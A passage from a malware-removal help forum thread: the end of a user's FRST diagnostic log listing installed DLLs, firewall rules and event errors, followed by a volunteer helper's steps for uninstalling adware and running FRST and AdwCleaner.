2015-12-11 12:38 - 2015-12-08 16:36 - 00038696 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\fastpath.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00024528 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32event.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00020936 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\mmapfile.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00114640 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32security.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00021320 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_cffi_pywin_kernel32_xde9e4433x360333f0.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00124880 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32file.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00030160 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32pipe.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00043472 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32process.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00175560 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32gui.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00028616 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32ts.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00024016 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32clipboard.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00048592 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32service.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00024392 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\librsyncffi.compiled._librsyncffi.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00036296 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\librsync.dll

2015-12-11 12:38 - 2015-10-30 20:00 - 00024016 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32profile.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00117056 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\breakpad.client.windows.handler.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00023376 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\winscreenshot.compiled._CaptureScreenshot.pyd

2015-12-11 12:38 - 2015-10-30 19:59 - 00134608 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_elementtree.pyd

2015-12-11 12:38 - 2015-10-30 19:59 - 00134088 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\pyexpat.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00240584 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\jpegtran.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00020280 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\cpuid.compiled._cpuid.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00052024 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\psutil._psutil_windows.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00021304 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Crypto.Util.strxor.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00350152 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\winxpgui.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00084792 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\dropbox_sqlite_ext.DLL

2015-12-11 12:38 - 2015-12-08 16:36 - 01826608 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtCore.pyd

2015-12-11 12:38 - 2015-10-30 20:00 - 00083912 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\sip.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 03891504 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtWidgets.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 01950000 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtGui.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00519984 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtNetwork.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00133936 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKit.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00225080 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKitWidgets.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00207672 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtPrintSupport.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00024904 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_cffi_wpad_proxy_win_x752e3d61xdcfdcc84.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00486704 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtQuick.pyd

2015-12-11 12:38 - 2015-12-08 16:36 - 00357680 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtQml.pyd

2015-03-04 16:45 - 2015-10-30 20:01 - 00019920 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\QtQuick.2\qtquick2plugin.dll

2015-03-04 16:45 - 2015-10-30 20:00 - 00786904 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\QtQuick\Controls\qtquickcontrolsplugin.dll

2015-07-30 06:30 - 2015-10-30 20:00 - 00063448 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\QtQuick\Layouts\qquicklayoutsplugin.dll

2015-03-04 16:45 - 2015-10-30 20:00 - 00019408 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\QtQuick\Window.2\windowplugin.dll

2015-12-11 12:38 - 2015-10-30 20:00 - 00060880 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32print.pyd

2014-11-17 12:13 - 2014-11-17 12:13 - 00316576 _____ () C:\Program Files\Microsoft Office 15\root\office15\AppVIsvStream32.dll

2011-03-01 22:14 - 2011-03-01 22:14 - 02143576 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll

2011-03-01 22:14 - 2011-03-01 22:14 - 07954776 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll

2011-03-01 22:15 - 2011-03-01 22:15 - 00340824 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll

2011-03-01 22:15 - 2011-03-01 22:15 - 00027480 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll

2011-03-01 22:15 - 2011-03-01 22:15 - 00126808 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll

2013-08-22 19:43 - 2013-08-22 19:43 - 00272688 _____ () C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\node_modules\SBSDK.node

2013-08-22 19:44 - 2013-08-22 19:44 - 00039216 _____ () C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\node_modules\HWR.node

2013-08-22 19:44 - 2013-08-22 19:44 - 00053040 _____ () C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\node_modules\SWR.node

2013-08-22 19:44 - 2013-08-22 19:44 - 00057648 _____ () C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\node_modules\MWR.node

2013-08-22 19:44 - 2013-08-22 19:44 - 00014848 _____ () C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\node_modules\SessionNotification.node

2014-08-05 19:57 - 2013-12-10 10:27 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll

2016-01-10 11:54 - 2016-01-10 11:54 - 00113424 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Utils.dll

2016-01-10 11:54 - 2016-01-10 11:54 - 00044304 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Common.Platform.dll

2016-01-10 11:54 - 2016-01-10 11:54 - 00010000 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.UpdateComponents.dll

2016-01-10 11:54 - 2016-01-10 11:54 - 00272656 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.Business.dll

2016-01-10 11:54 - 2016-01-10 11:54 - 00022288 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.AvastWrapper.dll

2016-01-10 11:54 - 2016-01-10 11:54 - 00046864 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.adblocker.dll

2016-01-10 11:54 - 2016-01-10 11:54 - 00012560 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Utils.SqlLite.dll

2016-01-10 11:54 - 2016-01-10 11:54 - 00120080 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.PUP.Management.dll

2016-01-10 11:54 - 2016-01-10 11:54 - 00036112 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.CSharp.Utilities.dll

2016-01-10 11:55 - 2016-01-10 11:55 - 00121912 _____ () C:\Program Files (x86)\Get-a-Clip\Get-a-Clip.Config.dll

2016-01-10 11:56 - 2015-11-30 14:51 - 00201216 _____ () C:\Program Files\FusionBrowser\1.265.1\isa.dll

2016-01-10 11:56 - 2015-12-02 14:46 - 00858112 _____ () C:\Program Files\FusionBrowser\1.265.1\bl.dll

2016-01-10 11:56 - 2015-10-14 08:41 - 01481728 _____ () C:\Program Files\FusionBrowser\1.265.1\libglesv2.dll

2016-01-10 11:56 - 2015-10-14 08:41 - 00073728 _____ () C:\Program Files\FusionBrowser\1.265.1\libegl.dll

2016-01-10 11:56 - 2015-11-27 11:44 - 09596928 _____ () C:\Program Files\FusionBrowser\1.265.1\pdf.dll

2015-10-30 15:03 - 2015-09-01 07:25 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\Office15\1033\GrooveIntlResource.dll

2015-12-16 18:24 - 2015-12-10 22:54 - 01583432 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libglesv2.dll

2015-12-16 18:24 - 2015-12-10 22:54 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libegl.dll

2016-01-10 11:55 - 2016-01-10 11:55 - 00111600 _____ () C:\Windows\SysWOW64\mfllib.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\localhost -> localhost

IE trusted site: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg

DNS Servers: 209.18.47.61 - 209.18.47.62

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe

FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe

FirewallRules: [{E75569AE-50A8-44C1-A32F-AD23188C2CB6}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe

FirewallRules: [{7680980E-AFE8-4400-86BE-E8CB45B91F9C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe

FirewallRules: [{6901D64F-8A7C-49ED-B599-379F31A1D079}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe

FirewallRules: [{86B23BAD-5055-406F-BB36-738D9FB3699C}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe

FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe

FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe

FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe

FirewallRules: [{DC77C6D1-D024-493B-8B75-410DF81A6358}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe

FirewallRules: [{7168F623-787A-4CDE-A5A4-438705AD2602}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMR\PowerDVD12DMREngine.exe

FirewallRules: [{E6CA9AA2-23FF-41A8-AA49-38016672B113}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe

FirewallRules: [{63BAC35C-EE22-4B00-975D-F7795CFAD160}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12Agent.exe

FirewallRules: [{6C522205-C94A-4F4E-B895-3F416E04B44C}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe

FirewallRules: [{471F6A8E-1FF9-49EF-847B-5C6B3CB3D12B}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe

FirewallRules: [{0B1727FC-2FFC-4A3D-9AE4-6A32CB3F2753}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe

FirewallRules: [{A7B24D37-F84C-4EEF-A81E-6E88143D37BB}] => (Allow) C:\Users\Charlie\AppData\Local\Temp\7zS65A9\hppiw.exe

FirewallRules: [{4FE76D1B-5775-4778-8125-56AA8D00B059}] => (Allow) C:\Users\Charlie\AppData\Local\Temp\7zS65A9\hppiw.exe

FirewallRules: [{A882E021-2855-4880-849D-8CA9690D3D71}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\bin\FaxApplications.exe

FirewallRules: [{AA3EA242-0AEB-4293-8779-68CA68858092}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\bin\DigitalWizards.exe

FirewallRules: [{8971BE9B-6954-45D6-9570-61022EC543CE}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\bin\SendAFax.exe

FirewallRules: [{45185B2D-FFEA-4CA7-BFEB-4B1F5DEA3392}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\Bin\DeviceSetup.exe

FirewallRules: [{7BE75A0B-473B-47E2-8495-A466A38D1DB3}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicator.exe

FirewallRules: [{8771921B-36F7-41CC-9BC1-1C3F09441BE4}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicatorCom.exe

FirewallRules: [{AB51C4E2-4697-419D-94C9-D05F75F35E90}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe

FirewallRules: [{99E785A4-EE33-4BA9-B2EC-B9AE4AA232A7}] => (Allow) C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Dropbox.exe

FirewallRules: [{639DBDAE-AF66-45D9-8C19-28DD2B4CD3F1}] => (Allow) C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Dropbox.exe

FirewallRules: [TCP Query User{924914E8-9B73-4F52-A8EB-1974847A3A64}C:\users\charlie\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\charlie\appdata\roaming\dropbox\bin\dropbox.exe

FirewallRules: [UDP Query User{C3C42EF4-E849-4E17-84FD-7C51B888F724}C:\users\charlie\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\charlie\appdata\roaming\dropbox\bin\dropbox.exe

FirewallRules: [{4C865574-1791-467D-A39E-777F35B9BB5A}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe

FirewallRules: [{9FBBACC0-771E-4247-82B3-97C554071FE3}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\UCGui.exe

FirewallRules: [{D9E6B306-441A-4561-88EA-2B45E29BDF17}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\UCGui.exe

FirewallRules: [{0D410DCC-E755-45B5-A0BA-15CF135860A1}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\UCService.exe

FirewallRules: [{B9D13898-08A4-4BE6-9030-81B80A9D1C96}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\UCService.exe

FirewallRules: [{9F760AEE-E28D-4246-85F6-D798DBD37D95}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTSNMPAgent.exe

FirewallRules: [{728DB316-43BE-4AC1-AE04-6E2D67FC6DD5}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTSNMPAgent.exe

FirewallRules: [{415E4BA5-28B9-4705-A0D2-FCC36C68F5B3}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe

FirewallRules: [{DFE46748-6EAE-40FB-A7EE-80588A78F708}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe

FirewallRules: [{DABE3CAF-D079-48DB-88B5-E315F1930A59}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe

FirewallRules: [{A66A3673-3901-4F0E-A931-CF762C470A52}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe

FirewallRules: [{83FECCAA-FC3E-4F60-9206-F5C7E977D0BA}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe

FirewallRules: [{46D0D44E-BBA0-43E7-9B59-91A072459763}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

25-12-2015 10:47:29 Scheduled Checkpoint

01-01-2016 11:46:28 Scheduled Checkpoint

01-01-2016 14:54:52 McAfee Vulnerability Scanner

09-01-2016 01:54:13 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============

Name: SMART Virtual TabletPC

Description: SMART Virtual TabletPC

Class Guid: {745a17a0-74d3-11d0-b6fe-00a0c90f57da}

Manufacturer: SMART Technologies ULC

Service: SMARTVTabletPCx64

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Officejet Pro 8600

Description: Officejet Pro 8600

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: HP

Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

==================== Event log errors: =========================

Application errors:

==================

Error: (01/10/2016 10:11:08 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )

Description: 80004005

Error: (01/09/2016 10:57:01 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: msn.exe, version: 11.50.44.1200, time stamp: 0x55cbe32e

Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000

Exception code: 0xc0000005

Fault offset: 0x74d9cb49

Faulting process id: 0x2cc8

Faulting application start time: 0xmsn.exe0

Faulting application path: msn.exe1

Faulting module path: msn.exe2

Report Id: msn.exe3

Error: (01/09/2016 09:26:15 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: OPBHOBrokerDsktop.exe, version: 8.0.1.11, time stamp: 0x5335c3d5

Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000

Exception code: 0xc0000005

Fault offset: 0x000001bb2051ff41

Faulting process id: 0x11a8

Faulting application start time: 0xOPBHOBrokerDsktop.exe0

Faulting application path: OPBHOBrokerDsktop.exe1

Faulting module path: OPBHOBrokerDsktop.exe2

Report Id: OPBHOBrokerDsktop.exe3

Error: (01/09/2016 08:34:17 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: Task Scheduling Error: m->NextScheduledSPRetry 830580

Error: (01/09/2016 08:34:17 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: Task Scheduling Error: m->NextScheduledEvent 830580

Error: (01/09/2016 08:34:17 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: Task Scheduling Error: Continuously busy for more than a second

Error: (01/09/2016 08:20:27 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: Task Scheduling Error: m->NextScheduledSPRetry 998

Error: (01/09/2016 08:20:27 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: Task Scheduling Error: m->NextScheduledEvent 998

Error: (01/09/2016 08:20:27 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: Task Scheduling Error: Continuously busy for more than a second

Error: (01/09/2016 05:21:29 PM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: Task Scheduling Error: m->NextScheduledSPRetry 1188665

System errors:

=============

Error: (01/03/2016 05:58:32 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)

Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)

Error: (01/03/2016 05:57:50 PM) (Source: Microsoft-Windows-WHEA-Logger) (EventID: 18) (User: NT AUTHORITY)

Description: A fatal hardware error has occurred.

Reported by component: Processor Core

Error Source: 3

Error Type: 9

Processor ID: 0

The details view of this entry contains further information.

Error: (01/02/2016 01:46:10 PM) (Source: Service Control Manager) (EventID: 7011) (User: )

Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the HPWMISVC service.

Error: (01/02/2016 01:46:11 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)

Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)

Error: (01/02/2016 01:46:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: The Windows Search service failed to start due to the following error:

%%1053

Error: (01/02/2016 01:46:01 PM) (Source: Service Control Manager) (EventID: 7009) (User: )

Description: A timeout was reached (30000 milliseconds) while waiting for the Windows Search service to connect.

Error: (01/02/2016 01:46:01 PM) (Source: DCOM) (EventID: 10005) (User: )

Description: 1053WSearch{9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (01/02/2016 01:45:37 PM) (Source: Microsoft-Windows-WHEA-Logger) (EventID: 18) (User: NT AUTHORITY)

Description: A fatal hardware error has occurred.

Reported by component: Processor Core

Error Source: 3

Error Type: 9

Processor ID: 0

The details view of this entry contains further information.

Error: (01/02/2016 01:42:40 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}

Error: (01/02/2016 01:41:38 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {EC9100F8-5918-4F1B-9CC1-4D34A64E0FE0}

==================== Memory info ===========================

Processor: Intel® Core™ i7-4710HQ CPU @ 2.50GHz

Percentage of memory in use: 53%

Total physical RAM: 8126.3 MB

Available physical RAM: 3783.11 MB

Total Virtual: 16250.8 MB

Available Virtual: 11494.99 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:908.31 GB) (Free:819.22 GB) NTFS ==>[system with boot components (obtained from drive)]

Drive d: (Recovery) (Fixed) (Total:22.9 GB) (Free:2.46 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================

Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 31772172)

Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)

Partition 2: (Not Active) - (Size=908.3 GB) - (Type=07 NTFS)

Partition 3: (Not Active) - (Size=22.9 GB) - (Type=07 NTFS)

Partition 4: (Not Active) - (Size=102 MB) - (Type=0C)

==================== End of Addition.txt ============================

#2
Bruce1270

Posted 10 January 2016 - 03:18 PM

Trusted Helper

Malware Removal
1,714 posts

Hello cmspears and :welcome:

My name is Bruce1270 and I will be helping you with your malware problem.

Please Note: I am still in training and my fixes have to be approved by my instructor so there may be a slight delay in my replies. Look upon it as a good thing though in that you have two people looking at your problem.

A few things before we get started.

Please read all instructions carefully. If there is anything you do not understand please ask me first before doing anything.
Please be patient. I am a volunteer who does this in my spare time so I will try to get back to you as soon as possible.
Please follow all instructions in the order given.
Please do not install any other software unless advised. This may hinder the removal process.
At the top of your post, please click on the "Follow this topic" button and make sure that the "Received notification" box is checked and set to "Instantly" This will send an email to you as soon as I reply to your topic, allowing us to solve your problem faster.
Please make sure you reply within 4 days to my responses, if there is no reply within 4 days, the topic will be closed and you will need to request the topic be reopened.

Important!

Please save or print off these instructions. Part of this fix may require you to be in safe mode where you will not be able to access the internet or my instructions!

I would strongly recommend you back up your personal data and folders before we begin.

Malware removal can be very long, complicated and may take multiple steps. I understand this may be frustrating but please stay with this topic until your machine is declared clean. The results will hopefully be very rewarding.
As we go along please tell me how the computer is running now. Please be as descriptive as possible e.g. I'm still getting web redirects, I am unable to access the internet etc.

OK. Let's move on.

I'll need a little time to analyse the logs and will post back with further instructions.

#3
Bruce1270

Posted 11 January 2016 - 01:54 AM

Trusted Helper

Malware Removal
1,714 posts

Hi cmspears

Lets see if we can clean this up for you.

Step - Remove Programs

Please uninstall the following unwanted programs:
FromDocToPDF Internet Explorer Toolbar
Fusion Browser 1.265.1
One System Care
Get-a-Clip
ShopAtHome.com Helper
ShopAtHome.com Toolbar

Note: If any of the programs are not listed or do not uninstall, proceed to the next one and work through the list.

To do this:
Please go to Start Menu -> Control Panel -> Uninstall a program or Programs and Features
In the list of installed programs locate and click on the program to uninstall
Click uninstall.
Repeat the above steps for all the other programs to remove.

Step2- FRST fix

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Download the attached fixlist.txt to your desktop.

fixlist.txt 19.5KB 263 downloads

Ensure fixlist.txt is in the same location as FRST.exe on your desktop.
Run FRST by right clicking on it and selecting Run as Administrator and press Fix
On completion a log (fixlog.txt) will be generated.
Please select all text in this fix, copy (CTRL + C) and then Paste (CTRL + V) in your next reply.

Step3 - run adwCleaner

Important: Please disable your anti virus prior to running this program.. Advice on how to do this for your anti virus can be found here

Download AdwCleaner from here to the Desktop
Close all open windows and browsers
Double click the Adwcleaner icon to execute the program
When the Tool opens for the first time accept the Terms of use
Click the Scan button and wait for the program to finish.
When finished, please click Cleaning button.
Upon completion, click Logfile. A log (AdwCleaner[C*].txt) will open.
Please copy and paste this in your next reply.

Reboot your machine and enable your anti virus again.

Things for your next post:
fixlog.txt
adwCleaner[C*].txt
How is the computer running now?

#4
cmspears

Posted 11 January 2016 - 09:11 PM

New Member

Topic Starter
Member
4 posts

Hi Bruce1270,

